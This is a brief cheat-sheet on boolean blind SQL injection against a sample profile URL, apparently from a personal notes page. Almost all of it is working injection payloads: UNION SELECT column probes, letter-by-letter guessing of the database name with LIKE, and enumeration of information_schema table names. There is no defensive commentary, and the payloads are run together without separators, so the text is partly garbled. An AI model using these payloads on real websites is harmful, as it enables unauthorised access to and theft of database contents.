Boolean SQL Injection Blind
http://sumwebsite.com/profile?id=1
select * from profiles where id = '%1%'
LIMIT 1;0' UNION SELECT 1;--0' UNION SELECT 1,2,3 where database()
like 's%';--0' UNION SELECT 1,2,3 where database()
like 'sq%';--0' UNION SELECT 1,2,3 FROM
information_schema.tables WHERE
table_schema = 'dbhacked' and table_name
like 'a%';--
Last updated